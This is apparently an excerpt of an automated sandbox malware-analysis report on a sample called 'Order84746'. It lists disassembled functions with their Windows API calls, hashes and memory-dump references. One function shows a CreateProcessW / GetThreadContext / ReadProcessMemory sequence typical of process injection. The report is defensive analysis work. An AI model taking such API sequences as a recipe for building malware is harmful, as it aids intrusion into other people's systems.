                          • Opcode Fuzzy Hash: 20f76424029b3f4f106c4d8a086868d24a1af312dab904e69dcb584714f23b8e
                          • Instruction Fuzzy Hash: AEE012A26417614AEA2465B97E4CFB313CC4F45351714081DB59AE718ACF24F84089A4
                          Function 008E2322 Relevance: 3.9, APIs: 3, Instructions: 159COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 008E22A4: RegisterClipboardFormatW.USER32(WM_GETCONTROLNAME), ref: 008E2303
                          • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 008E25A1
                          • CoInitialize.OLE32(00000000), ref: 008E2618
                          • CloseHandle.KERNEL32(00000000), ref: 0095503A
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Handle$ClipboardCloseFormatInitializeRegister
                          • String ID:
                          • API String ID: 458326420-0
                          • Opcode ID: f0e31230d1acf038b70b8dc1e7e6a062dceefcf2b31a94a130882602bfec0426
                          • Instruction ID: f59b9bdc69a8a4aa305a3d341293272a8c14a7c502b0a2afb5668743a2ae3875
                          • Opcode Fuzzy Hash: f0e31230d1acf038b70b8dc1e7e6a062dceefcf2b31a94a130882602bfec0426
                          • Instruction Fuzzy Hash: 9271B2B89293958B8714DF5EAD90654BBE4FF9B384F80412ED929C76B1CB308404EFD5
                          Function 0092BBE8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: __fread_nolock
                          • String ID: EA06
                          • API String ID: 2638373210-3962188686
                          • Opcode ID: 8ef40e1db507a9689c94d676b47f00ec059bc1b2a9f7528a07fe54c64e331170
                          • Instruction ID: 3f55e72c58525866e90272e22d523e4ba519c360f5857c4c2af45f2dbabc1c0c
                          • Opcode Fuzzy Hash: 8ef40e1db507a9689c94d676b47f00ec059bc1b2a9f7528a07fe54c64e331170
                          • Instruction Fuzzy Hash: 0801B5729042187EDB28C7A8C856FEEBBFC9B15305F00859AF592D61C1E5B4A7088B60
                          Function 008E3A0F Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                          Download Yara Rule
                          APIs
                          • 745EC8D0.UXTHEME ref: 008E3A73
                            • Part of subcall function 00901405: __lock.LIBCMT ref: 0090140B
                            • Part of subcall function 008E3ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 008E3AF3
                            • Part of subcall function 008E3ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 008E3B08
                            • Part of subcall function 008E3D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,008E3AA3,?), ref: 008E3D45
                            • Part of subcall function 008E3D19: IsDebuggerPresent.KERNEL32(?,?,?,?,008E3AA3,?), ref: 008E3D57
                            • Part of subcall function 008E3D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,009A1148,009A1130,?,?,?,?,008E3AA3,?), ref: 008E3DC8
                            • Part of subcall function 008E3D19: SetCurrentDirectoryW.KERNEL32(?,?,?,008E3AA3,?), ref: 008E3E48
                          • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 008E3AB3
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: InfoParametersSystem$CurrentDirectory$DebuggerFullNamePathPresent__lock
                          • String ID:
                          • API String ID: 3809921791-0
                          • Opcode ID: 18a75aeb59b5a573fe2da24e768bda14bb468d40b896903fbe12d23b9b32c77e
                          • Instruction ID: e96fc7743f67117934f05ae8b805c19adb09ac496e550571fb21fc59d5cc4055
                          • Opcode Fuzzy Hash: 18a75aeb59b5a573fe2da24e768bda14bb468d40b896903fbe12d23b9b32c77e
                          • Instruction Fuzzy Hash: 6411A971A1C3549FC300EF6AE80991ABBE8FF96750F00891EF584832B1DB708984DBD2
                          Function 0090E9D2 Relevance: 3.1, APIs: 2, Instructions: 52COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • ___lock_fhandle.LIBCMT ref: 0090EA29
                          • __close_nolock.LIBCMT ref: 0090EA42
                            • Part of subcall function 00907BDA: __getptd_noexit.LIBCMT ref: 00907BDA
                            • Part of subcall function 00907C0E: __getptd_noexit.LIBCMT ref: 00907C0E
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                          • String ID:
                          • API String ID: 1046115767-0
                          • Opcode ID: 33c61a338031d25d01afa18151448fddf9b89d529b3e0e20abe30bfe9e7e3d1c
                          • Instruction ID: fe63f72aa43fe22f550857ad2d658db48aa5b602c00bf0fafe21ccaf6dc6a41e
                          • Opcode Fuzzy Hash: 33c61a338031d25d01afa18151448fddf9b89d529b3e0e20abe30bfe9e7e3d1c
                          • Instruction Fuzzy Hash: E911C872A096108FE711BFA8C841359BBA16FC6331F264B40E4705F2E3CBB89C409BE5
                          Function 00903839 Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: __lock_file_memset
                          • String ID:
                          • API String ID: 26237723-0
                          • Opcode ID: 4f8816fb7f9e31a9a34c78ef6b2ecc5164098a26d7d82ee975b1e7723e791759
                          • Instruction ID: 25e3358dea5cddcec63392e51e8e16173c5aad4ff945edea02d6d749a36417ce
                          • Opcode Fuzzy Hash: 4f8816fb7f9e31a9a34c78ef6b2ecc5164098a26d7d82ee975b1e7723e791759
                          • Instruction Fuzzy Hash: FA014472D00209EFCF22BFA5CC0669E7B69AFC0360F15C659F824561E1D7718B61DB91
                          Function 009035E4 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00907C0E: __getptd_noexit.LIBCMT ref: 00907C0E
                          • __lock_file.LIBCMT ref: 00903629
                            • Part of subcall function 00904E1C: __lock.LIBCMT ref: 00904E3F
                          • __fclose_nolock.LIBCMT ref: 00903634
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                          • String ID:
                          • API String ID: 2800547568-0
                          • Opcode ID: 8b204d04dd319074fb5541c1af8eb7d6f937fe20b7a63aaeae19ecff09393802
                          • Instruction ID: b84b781cfcf31a7dc09a968a182ce49806fbd84ac22b8b6fd6738c9f227bd109
                          • Opcode Fuzzy Hash: 8b204d04dd319074fb5541c1af8eb7d6f937fe20b7a63aaeae19ecff09393802
                          • Instruction Fuzzy Hash: F5F0B471941704AEEB117F66C80776EBAAC6F80334F29C508E424EB2D1CB7C8A419F95
                          Function 011D9ED5 Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                          Download Yara Rule
                          APIs
                          • CreateProcessW.KERNELBASE(?,00000000), ref: 011DA693
                          • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 011DA729
                          • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 011DA74B
                          Memory Dump Source
                          • Source File: 00000000.00000002.1678053935.00000000011D8000.00000040.00000020.00020000.00000000.sdmp, Offset: 011D8000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_11d8000_Order84746.jbxd
                          Similarity
                          • API ID: Process$ContextCreateMemoryReadThreadWow64
                          • String ID:
                          • API String ID: 2438371351-0
                          • Opcode ID: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                          • Instruction ID: f1b775875acca5ba1a18d52efb03d0369bdd60c80e1910fc3ff10e9eed5a56d1
                          • Opcode Fuzzy Hash: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                          • Instruction Fuzzy Hash: 3012DE24E18658C6EB24DF64D8507DEB232EF68300F1091E9910DEB7A5E77A4F81CF5A
                          Function 00902957 Relevance: 1.6, APIs: 1, Instructions: 135COMMON
                          Download Yara Rule
                          APIs
                          • __flush.LIBCMT ref: 00902A0B
                            • Part of subcall function 00907C0E: __getptd_noexit.LIBCMT ref: 00907C0E
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: __flush__getptd_noexit
                          • String ID:
                          • API String ID: 4101623367-0
                          • Opcode ID: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                          • Instruction ID: f375bdf6e8d4010384b1d486101d5214de377386e1115e5d3f6a69c112f38d80
                          • Opcode Fuzzy Hash: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                          • Instruction Fuzzy Hash: 144194717007069FDF2C8FA9C9895AE7BAAAF84360F24853DE855C72C0EB74DD418B50
                          Function 008FED18 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: ProtectVirtual
                          • String ID:
                          • API String ID: 544645111-0
                          • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                          • Instruction ID: 778fbe5674c5c879746a80562f370dc16c765debf0222ca90fb1946083a2edd5
                          • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                          • Instruction Fuzzy Hash: FD31C474A0010DDBD718EF6CC480A79FBA6FF49344B6486A5E509CBA66DB31EDC1CB90
                          Function 00959A75 Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: ClearVariant
                          • String ID:
                          • API String ID: 1473721057-0
                          • Opcode ID: 084618bbf65c67bb006889d164855784f72a214228730f851d3c679230aee2e7
                          • Instruction ID: f15168472bcb486ef55658a68b77e67d27d5d3363a1c83e613b29ee6f0d75f41
                          • Opcode Fuzzy Hash: 084618bbf65c67bb006889d164855784f72a214228730f851d3c679230aee2e7
                          • Instruction Fuzzy Hash: 07413E74504655CFEB24DF29C484B2ABBE0FF45308F19895CEA968B362C772E845CF52
                          Function 0090ED06 Relevance: 1.6, APIs: 1, Instructions: 66COMMONLIBRARYCODE
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: __getptd_noexit
                          • String ID:
                          • API String ID: 3074181302-0
                          • Opcode ID: 7cf957578b230d449b7d0b15876ce02d5352d325ed99bd77b28d66b10364fcf5
                          • Instruction ID: cee8994a90d80197ec81daca24dd7fceb1c6ba69f3abf6d52e623d3b2cf76ddc
                          • Opcode Fuzzy Hash: 7cf957578b230d449b7d0b15876ce02d5352d325ed99bd77b28d66b10364fcf5
                          • Instruction Fuzzy Hash: 922190728186148FE712BFA8CC453597B61AFC2336F264E40F4704F2E2DBB49C509BA1
                          Function 008E41A9 Relevance: 1.6, APIs: 1, Instructions: 63libraryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 008E4214: FreeLibrary.KERNEL32(00000000,?), ref: 008E4247
                          • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,008E39FE,?,00000001), ref: 008E41DB
                            • Part of subcall function 008E4291: FreeLibrary.KERNEL32(00000000), ref: 008E42C4
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Library$Free$Load
                          • String ID:
                          • API String ID: 2391024519-0
                          • Opcode ID: f8f23255285f47ebde9df68b59a007db78ee8d63604d52917a60bcca58dae265
                          • Instruction ID: 3687dd45f736a9d4de12c36c88c03e0618b5dc731075bbf2da7fe6529c67684e
                          • Opcode Fuzzy Hash: f8f23255285f47ebde9df68b59a007db78ee8d63604d52917a60bcca58dae265
                          • Instruction Fuzzy Hash: 6511EB31600305ABCB10FB7ADD16F9D77E9EF41704F108429FA5AE61C1DB749A449B61
                          Function 00959B45 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: ClearVariant
                          • String ID:
                          • API String ID: 1473721057-0
                          • Opcode ID: eb87c221d434b70a3996d97cb1eae4f3720108754134861d8cba16bfec0f82c7
                          • Instruction ID: 04ea0e460ac6de0b358c95773b27f9dc90524646bf5a9787e26b2e7e169c6c5c
                          • Opcode Fuzzy Hash: eb87c221d434b70a3996d97cb1eae4f3720108754134861d8cba16bfec0f82c7
                          • Instruction Fuzzy Hash: FE210A70508619CFDB24DF69C444A2ABBE1FF89308F154A6CEA9687262D731E845CF52
                          Function 0090AF61 Relevance: 1.6, APIs: 1, Instructions: 56COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • ___lock_fhandle.LIBCMT ref: 0090AFC0
                            • Part of subcall function 00907BDA: __getptd_noexit.LIBCMT ref: 00907BDA
                            • Part of subcall function 00907C0E: __getptd_noexit.LIBCMT ref: 00907C0E
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: __getptd_noexit$___lock_fhandle
                          • String ID:
                          • API String ID: 1144279405-0
                          • Opcode ID: c4707881b0e03dda8e358f96908627d4f94d6c46476e2bdec4398832f6255a58
                          • Instruction ID: 132a2beb42709c2b5846200f82fa87d96d12c514f992d674024d747a488e78aa
                          • Opcode Fuzzy Hash: c4707881b0e03dda8e358f96908627d4f94d6c46476e2bdec4398832f6255a58
                          • Instruction Fuzzy Hash: 231191729096109FE7127FA4C84276E7B74AFC2331F264640E4741F2E2D7B99D109BE1
                          Function 008E39DB Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: LibraryLoad
                          • String ID:
                          • API String ID: 1029625771-0
                          • Opcode ID: 279f5f87aea4605f70f2d64a128fa314d82d263771f3b219d5efef33e318cff7
                          • Instruction ID: 304fe1019149d4ed1f5b3aeced8a482601522affa2b422a66498cbcaffb96aff
                          • Opcode Fuzzy Hash: 279f5f87aea4605f70f2d64a128fa314d82d263771f3b219d5efef33e318cff7
                          • Instruction Fuzzy Hash: 1501497150014DAFCF05EFA5C8918FEBB78FF12344F108025B956D7195EA309A49DF61
                          Function 00902AAE Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                          Download Yara Rule
                          APIs
                          • __lock_file.LIBCMT ref: 00902AED
                            • Part of subcall function 00907C0E: __getptd_noexit.LIBCMT ref: 00907C0E
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: __getptd_noexit__lock_file
                          • String ID:
                          • API String ID: 2597487223-0
                          • Opcode ID: de52e6f6bb86d9507d57708d85a8820076ba678a9f220423e602c6859d21cd27
                          • Instruction ID: db4926fecdc06335bc62f2a477f01ac6b361971681d6b98cf96db1a340756e27
                          • Opcode Fuzzy Hash: de52e6f6bb86d9507d57708d85a8820076ba678a9f220423e602c6859d21cd27
                          • Instruction Fuzzy Hash: 31F06D31A00205EEDF21AFA9CC0A79F7AA9BF80320F158415B4149A1E1DB788A62DB91
                          Function 008E4252 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                          Download Yara Rule
                          APIs
                          • FreeLibrary.KERNEL32(?,?,?,?,?,008E39FE,?,00000001), ref: 008E4286
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
